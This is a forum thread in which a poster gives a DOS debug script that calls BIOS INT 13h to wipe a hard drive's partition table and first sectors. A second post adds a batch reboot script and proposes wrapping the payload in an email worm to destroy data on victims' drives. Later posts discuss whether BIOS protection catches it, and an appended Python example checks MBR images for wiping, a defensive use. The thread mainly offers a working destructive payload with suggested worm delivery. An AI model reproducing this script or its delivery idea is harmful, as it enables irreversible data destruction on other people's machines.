
Thread: possibly the world's deadliest virus

  1. #1

    possibly the world's deadliest virus

    I want to post this simple and small debug script.

    A:\>debug <enter>
    -F 200 L1000 0 <enter>
    -A CS:100 <enter>
    xxxx:0100 MOV AX,301 <enter>
    xxxx:0103 MOV BX,200 <enter>
    xxxx:0106 MOV CX,1 <enter>
    xxxx:0109 MOV DX,80 <enter>

    (80 for hd 0 or 81 for hd 1 )

    xxxx:010C INT 13 <enter>
    xxxx:010E INT 20 <enter>
    xxxx:0110 <enter>
    -g <enter>
    Program terminated normally
    -q<enter>

    This code invokes BIOS int13h to wipe out the first 1000 sectors on a hard drive....where the partition table info resides. This will wipe a hard drive clean. Now imagine using this code as a virus payload. There are of course some limitations to the effectiveness of this potential virus....but if all the conditions are right this will wipe your hard drive CLEAN. I wonder if someone will figure out a way to encapsulate this payload in with email transport code. The way to block would be to have the Antivirus prog detect an unauthorised int13h invocation....any ideas anyone..could it be done?

  2. #2
    I realize the prior script posted would require disk access not available with a GUI OS....I therefore propose this script to reboot the machine...then have a little .exe that has an object linker to call this .com prog. The only remaining thing to do is encapsulate it in an email transport worm. This would then wipe out any data on the hard drive.

    reboot script inside a batch file:

    GOTO BEGIN

    E 40:72 34 12
    RCS
    FFFF
    RIP
    0000
    G

    :BEGIN
    DEBUG < REBOOT.BAT

  3. #3
    Hi mom! · Join Date: Aug 2001 · Posts: 1,103
    One thing: most up-to-date BIOSes start flashing messages whenever something tries to alter the partition-table...

  4. #4
    hmmmmm....it would only catch the DOS write interrupt. The BIOS's own int13 would not be caught in this manner. The next time you have a box you want to Fdisk give the 1st script a try with the BIOS's AV turned on. I did it on mine (Award BIOS) and it didn't say a thing.

  5. #5
    Hi mom! · Join Date: Aug 2001 · Posts: 1,103
    Heh! I'll try that.. too bad I just re-installed two weeks ago, don't feel like messing up everything again... Still, that'd be ... well, that'd definitely suck

  6. #6
    If you do not have the desire to properly rebuff a post then please do not assign antipoints to it. It is an abuse of the antipoint system to give - points without explaining why. Perhaps you think the post inappropriate..please state the reason. Someone gave me 5 - points for the last post..hmmmm that's about what you get hit with when the member has two dots..I <sarcasm>wonder</sarcasm> who it could be?

  7. #7
    Senior Member · Join Date: Sep 2001 · Posts: 831
    Originally posted by Guus

    One thing: most up-to-date BIOSes start flashing messages whenever something tries to alter the partition-table...


    While many BIOSes do have this feature, nearly all the ones I've seen have it turned off by default, most likely relying on the user to activate it after the operating system has been installed. But the chances are that the common user would not know of its existence, and as such, it is still turned off..

    Antihaxor: I have a computer that I need to do a fresh install of within the next couple of days.. I would be willing to test it for you if you wish.... providing it won't destroy the HDD...
    -Matty_Cross
    "Isn't sanity just a one trick pony anyway? I mean, all you get is one trick. Rational Thinking.
    But when you're good and crazy, hehe, the sky's the limit!!"

  8. #8
    Hi mom! · Join Date: Aug 2001 · Posts: 1,103
    Mine was turned on by default though - or I'm gravely mistaken - I got the same antipoints AH. Who's the one handing out that many negative points?

  9. #9
    No Matty it will not damage any hardware..It will just wipe the first 1000 sectors clean requiring you to fdisk and format again. This is an excellent way to wipe out partition table viruses that reside outside the DOS write interrupt range (thus immune to a classic "format").

  10. #10
    Originally posted by Guus
    Mine was turned on by default though - or I'm gravely mistaken - I got the same antipoints AH. Who's the one handing out that many negative points?
    It must be a SR member Guus because of the # of - points I got hit with. Perhaps the person in question feels I am trying to encourage virus writing..if so.. nothing is farther from the truth. I am just presenting a hypothetical situation to FOREWARN others of a possible deadly attack.
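
Added example, not part of any post in this thread: a check a responder can run on a saved copy of a disk's first sector to tell an intact partition table from the zero-filled sector the first post describes. The function names and the sample sector are constructed for illustration; the layout is the standard MBR format (four 16-byte entries at offset 446, `55 AA` at offset 510).

```python
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446       # four 16-byte partition entries start here
SIGNATURE = b"\x55\xaa"  # last two bytes of a valid MBR

def inspect_mbr(sector: bytes) -> dict:
    """Decode the partition table of a sector-0 image and classify its state."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly 512 bytes")
    partitions = []
    for i in range(4):
        entry = sector[TABLE_OFFSET + 16 * i:TABLE_OFFSET + 16 * (i + 1)]
        ptype = entry[4]
        lba_start, count = struct.unpack_from("<II", entry, 8)
        if ptype == 0 and count == 0:
            continue  # unused slot
        partitions.append({"slot": i, "active": entry[0] == 0x80,
                           "type": ptype, "lba_start": lba_start,
                           "sectors": count})
    signature_ok = sector[510:] == SIGNATURE
    if sector == bytes(SECTOR_SIZE):
        verdict = "wiped"        # every byte zero: table and boot code gone
    elif not signature_ok or not partitions:
        verdict = "damaged"      # partial overwrite or corrupt table
    else:
        verdict = "ok"
    return {"verdict": verdict, "signature_ok": signature_ok,
            "partitions": partitions}

def sample_mbr() -> bytes:
    """Constructed sample: one active FAT16 partition starting at LBA 63."""
    sector = bytearray(SECTOR_SIZE)
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x06,
                        b"\xfe\x3f\x7f", 63, 2048000)
    sector[TABLE_OFFSET:TABLE_OFFSET + 16] = entry
    sector[510:] = SIGNATURE
    return bytes(sector)

if __name__ == "__main__":
    print(inspect_mbr(sample_mbr()))
    print(inspect_mbr(bytes(SECTOR_SIZE)))  # constructed zero-filled sector
```

Keeping an offline copy of sector 0 taken while the disk is healthy gives both a baseline for this check and the bytes needed to restore the partition table.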
